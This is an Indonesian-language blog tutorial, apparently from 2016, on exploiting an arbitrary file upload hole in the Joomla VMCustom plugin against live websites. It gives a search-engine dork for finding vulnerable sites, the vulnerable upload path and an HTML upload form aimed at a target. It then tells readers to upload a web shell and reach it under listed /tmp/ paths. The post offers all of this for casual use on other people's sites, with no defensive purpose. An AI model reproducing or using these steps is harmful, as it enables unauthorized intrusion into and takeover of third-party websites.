Senin, 30 Mei 2016

Joomla Plugins VMCOSTUM Arbitrary File Upload





  Assalamualakum Mas Mbah :D

 Sekarang sya akan memberikan Tutorial "Joomla Plugins VMCOSTUM Arbitrary  File Upload"

Sebenarnya sya dapat tutor ini cuman jalan jalan ke blog orang sih :v

Klau gitu langsung aja baca artikel di bwah ini yah mas mbah :D .


  Dork : inurl:/plugins/vmcustom/

Masukkan dork diatas menggunakan mesin pencarian bukan mesin ketik yah :D

klau udah pilih salah satu web masukkan exploitnya kyak di bwah ini

"site.com/path/plugins/vmcustom/photoupload/assets/server/php/"

tanda vulnerable webnya kyak gini mas mbah


Klau Sudah kyak gitu sisa upload shellmu dengan menggunakan csrf di bwah


<center>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<font face="Iceland" color="red" size="7">jQuery File Upload</font>
<form method="POST" action="TARGET.com/path/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form><br>

Yang berwarna biru ganti dengan web vuln target yg sudah di dapat .

save dengan extensi .html mas mbah :D .

File yg bsa di upload cuman yg berextensi : PHP,HTML,JPG,PNG,JPEG,GIF .

Klau sudah di upload panggil shellnya disini

"www.site.com/tmp/shellberbentukrandom.php"

Atau

"www.site.com/tmp/nx_d5cc371096f4e5516bf0ea7b10707d68/0/Shellmu.php"

   Mudahkan Sisa praktekin dan tetap santai yah :D

Klau Kurang mengerti atau kurang vaham sisa isi kolom komentar yah :D

Exploit Author : AnoaGhost

Source Images : https://shirotenshii.blogspot.co.id/

Thanks To : PhantomGhost - Sulawesi IT Sec